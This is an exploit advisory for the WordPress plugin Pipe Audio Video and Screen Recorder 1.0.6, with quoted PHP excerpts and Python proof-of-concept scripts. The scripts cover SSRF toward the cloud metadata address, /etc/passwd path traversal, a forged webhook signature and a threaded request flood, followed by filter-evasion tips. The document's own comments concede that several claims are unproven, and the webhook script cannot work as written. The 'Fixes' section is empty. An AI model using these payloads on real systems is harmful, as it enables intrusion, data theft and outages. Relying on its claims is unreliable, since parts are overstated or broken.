# Exploit Title: WordPress Pipe Audio Video and Screen Recorder 1.0.6 - Multiple Vulnerabilities
# Date: March 28, 2025
# Exploit Author: bRpsd cy[at]live.no
# Plugin Link: https://wordpress.org/plugins/pipe-audio-video-and-screen-recorder/
# Version: 1.0.6
# Tested on: MacOS local Xampp
Vulnerability1: SSRF in File Download
File: load/AddPipe.php
Function: addpipe_handle_download()
Vulnerable Code:
================================================================================================
/**
 * Excerpt of the AJAX download handler: fetches the URL passed in $_POST['file']
 * after checking its host against a one-entry allowlist.
 *
 * Review notes:
 * - The allowlist is applied only to the URL as submitted. The fetch below goes
 *   through PHP's http(s) stream wrapper, which follows redirects by default, so
 *   the host that was validated is only the first hop.
 * - Exploitability as described therefore depends on the allowlisted host
 *   offering a redirect to an arbitrary destination; that is not shown on this page.
 * - Hardening: fetch with wp_safe_remote_get() and 'redirection' => 0 (or
 *   re-validate every hop), require the https scheme, and cap the response size.
 */
public function addpipe_handle_download() {
// ... (elided by the advisory; any nonce/capability check is not visible here)
// esc_url_raw()/wp_unslash() clean the value but do not restrict where it points.
$fileUrl = isset($_POST['file']) ? esc_url_raw(wp_unslash($_POST['file'])) : '';
$allowed_domains = ['addpipe.com'];
$parsed_url = wp_parse_url($fileUrl);
// Strict, exact host match: subdomains and look-alike hosts are rejected.
// The scheme is not checked in the lines shown.
if (!isset($parsed_url['host']) || !in_array($parsed_url['host'], $allowed_domains, true)) {
// wp_send_json_error() ends the request, so execution does not continue past a failed check.
wp_send_json_error(['message' => 'Unauthorized domain'], 403);
}
// '@' suppresses warnings, so a failed or unexpected fetch leaves no PHP notice.
// Redirects returned by the allowlisted host are followed without re-checking the host.
$fileContent = @file_get_contents($fileUrl); // SSRF here
// ...
}
================================================================================================
Vuln1 Python POC:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
import requests
# Demonstration request for the download handler quoted above.
# Preconditions: a valid WordPress nonce, and a redirect endpoint on the
# allowlisted host. The /redirect path used below is the advisory's illustration;
# nothing on this page shows that it exists.
# Detection: admin-ajax.php POSTs with action=addpipe_download_file whose "file"
# value embeds a second URL, and outbound requests from the web server to the
# link-local metadata address.
target = "http://example.com/wp-admin/admin-ajax.php"
nonce = "VALID_NONCE_HERE" # Replace with actual nonce
# Craft malicious URL (redirects to internal service)
malicious_url = "https://addpipe.com/redirect?url=http://169.254.169.254/latest/meta-data"
data = {
"action": "addpipe_download_file",
"file": malicious_url,
"_wpnonce": nonce
}
response = requests.post(target, data=data)
# Only the first 500 characters of the handler's response are printed.
print(f"SSRF Response ({response.status_code}):\n{response.text[:500]}")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vulnerability2: LFI via Quality Parameter
File: load/AddPipe.php
Function: addpipe_ajax_shortcode_generator()
Vulnerable Code:
================================================================================================
/**
 * Excerpt of the shortcode-generator AJAX handler: builds a relative path
 * "avq/<quality>.xml" from $_POST['quality'] and places it in $data.
 *
 * Review notes:
 * - sanitize_text_field() is a text sanitiser, not a path validator; it does not
 *   remove "../" segments, so the resulting string can point outside "avq/".
 * - The lines shown only build a string. Whether this is a file inclusion depends
 *   on how 'qualityurl' is consumed later, which is not shown on this page.
 * - The ".xml" suffix is always appended, which limits which files such a path can name.
 * - Hardening: accept only values from a fixed list of known quality profiles
 *   (or match against ^[A-Za-z0-9_-]+$) before building the path.
 */
public function addpipe_ajax_shortcode_generator() {
// ... (elided by the advisory; any nonce/capability check is not visible here)
$quality = isset($_POST['quality']) ? sanitize_text_field(wp_unslash($_POST['quality'])) : '';
// User-controlled value is concatenated into a path with no allowlist or basename() step.
$qualityurl = "avq/" . $quality . ".xml"; // LFI here
$data = [
'qualityurl' => $qualityurl,
// ...
];
// ...
}
================================================================================================
Vuln2 Python POC:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
import requests
from urllib.parse import quote
# Demonstration request for the shortcode-generator handler quoted above.
# Precondition: a valid WordPress nonce.
# The response shows file contents only if the server later reads the path built
# from "quality"; the quoted PHP excerpt does not show that step.
# Detection: admin-ajax.php POSTs with action=addpipe_ajax_shortcode_generator
# whose "quality" value contains path separators or ".." segments.
target = "http://example.com/wp-admin/admin-ajax.php"
nonce = "VALID_NONCE_HERE" # Replace with actual nonce
# Directory traversal payload
lfi_payload = quote("../../../../etc/passwd")
data = {
"action": "addpipe_ajax_shortcode_generator",
"quality": lfi_payload,
"_wpnonce": nonce
}
response = requests.post(target, data=data)
print(f"LFI Response ({response.status_code}):\n{response.text}")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vulnerability3: Webhook Signature Bypass
File: load/AddPipe.php
Function: addpipeWebhook()
Vulnerable Code:
================================================================================================
/**
 * Excerpt of the webhook receiver: verifies an HMAC-SHA1 signature over
 * (webhook URL + raw request body) before processing the payload.
 *
 * Review notes:
 * - The check shown is a keyed HMAC compared with hash_equals(), a timing-safe
 *   comparison. A missing header becomes '' and fails the comparison.
 * - Nothing in these lines lets a caller skip the check; forging a signature
 *   requires $this->pipeWebhookKey. The practical risk is key strength and key
 *   exposure, neither of which is shown on this page.
 * - No timestamp or nonce is verified in the lines shown, so replay of a
 *   captured valid request is not ruled out by this excerpt.
 * - Hardening: generate the key with a CSPRNG, keep it out of client-visible
 *   output and logs, support rotation, and add replay protection.
 */
public function addpipeWebhook() {
// The site's own webhook URL is part of the signed data.
$webhook_url = admin_url('admin-ajax.php?action=addpipeWebhook');
$received_signature = $_SERVER['HTTP_X_PIPE_SIGNATURE'] ?? '';
// Raw body is read as received, so the signature covers the exact bytes sent.
$json_payload = file_get_contents('php://input');
$data_to_sign = $webhook_url . $json_payload;
// Fourth argument true => raw binary HMAC, then base64-encoded.
$expected_signature = base64_encode(hash_hmac('sha1', $data_to_sign, $this->pipeWebhookKey, true));
if (!hash_equals($expected_signature, $received_signature)) {
wp_die('Unauthorized request', 403);
}
// ...
}
================================================================================================
Vuln3 Python POC:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
import hashlib
import base64
import requests
# Demonstration request for the webhook receiver quoted above.
# NOTE(review): known_key is assigned but never used below. The value computed
# here is an unkeyed SHA-1 digest, while the quoted handler verifies a keyed HMAC
# with hash_equals(), so this listing does not demonstrate a bypass of that check.
# Read it as an illustration of the impact if the webhook secret is weak or leaked.
# Detection: requests to action=addpipeWebhook that fail signature verification,
# especially repeated attempts from one source.
webhook_url = "http://example.com/wp-admin/admin-ajax.php?action=addpipeWebhook"
known_key = "WEAK_SECRET_KEY" # Replace with guessed/exposed key
malicious_payload = {
"event": "video_recorded",
"data": {
"id": 666,
"envCode": "attacker_env",
"videoName": "hacked_recording"
}
}
# Generate forged signature
signature_data = webhook_url + str(malicious_payload)
signature = base64.b64encode(
hashlib.sha1(signature_data.encode()).hexdigest().encode()
).decode()
headers = {
"X-Pipe-Signature": signature,
"Content-Type": "application/json"
}
response = requests.post(webhook_url, json=malicious_payload, headers=headers)
print(f"Webhook Injection ({response.status_code}): {response.text}")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vulnerability4: DoS via Sync Endpoint
File: load/AddPipe.php
Function: addpipe_ajax_sync_deleted()
Vulnerable Code:
================================================================================================
/**
 * Excerpt of the "sync deleted" AJAX handler: walks every stored recording,
 * checks whether its file still exists, and marks missing ones inactive.
 *
 * Review notes:
 * - Work per request grows with the number of recordings: one
 *   addpipeIsFileOnServer() call each, plus an UPDATE for each missing file.
 *   What that helper does (local or remote check) is not shown on this page.
 * - No nonce or capability check, rate limit or lock appears in the lines shown.
 *   The advisory's PoC states an admin nonce is required, which makes this an
 *   authenticated resource-exhaustion issue.
 * - $wpdb is used without a visible `global $wpdb;`, and the SQL string is
 *   truncated ("..."), so this excerpt is abbreviated rather than verbatim.
 * - Hardening: allow one sync at a time (e.g. a transient lock), process
 *   recordings in bounded batches or a scheduled background task, and throttle repeats.
 */
public function addpipe_ajax_sync_deleted() {
// Unbounded loop over all recordings on every call.
foreach ($this->addpipeGetRecordedRecordings() as $obj) {
if (!$this->addpipeIsFileOnServer($obj->recording_url)) {
// One UPDATE per missing file; the WHERE clause is cut off in the advisory.
$wpdb->query("UPDATE {$wpdb->prefix}addpipe_records SET active = 0...");
}
}
}
================================================================================================
Vuln4 POC:
import requests
from concurrent.futures import ThreadPoolExecutor
# Demonstration load against the sync handler quoted above.
# Precondition (per the advisory): an administrator's nonce, so the caller is
# already highly privileged.
# Detection: bursts of admin-ajax.php POSTs with action=addpipe_ajax_sync_deleted
# from a single session, together with rising PHP worker and database load.
# Mitigation: server-side locking and rate limiting on the handler.
target = "http://example.com/wp-admin/admin-ajax.php"
nonce = "VALID_ADMIN_NONCE" # Requires admin privileges
def send_sync_request(_):
data = {"action": "addpipe_ajax_sync_deleted", "_wpnonce": nonce}
response = requests.post(target, data=data)
return response.status_code
# Launch 100 concurrent requests
with ThreadPoolExecutor(max_workers=20) as executor:
results = list(executor.map(send_sync_request, range(100)))
# Prints the set of distinct HTTP status codes returned.
print(f"DoS Results: {set(results)}")
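Defense Bypass (for LFI/SSRF):
Use double encoding (%252e%252e%252f)
Chain with open redirect vulnerabilities
Exploit parser inconsistencies (e.g., ///etc/passwd)
A fix therefore has to validate the value after it has been fully decoded and canonicalised, and must not follow redirects to hosts outside the allowlist.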
Fixes: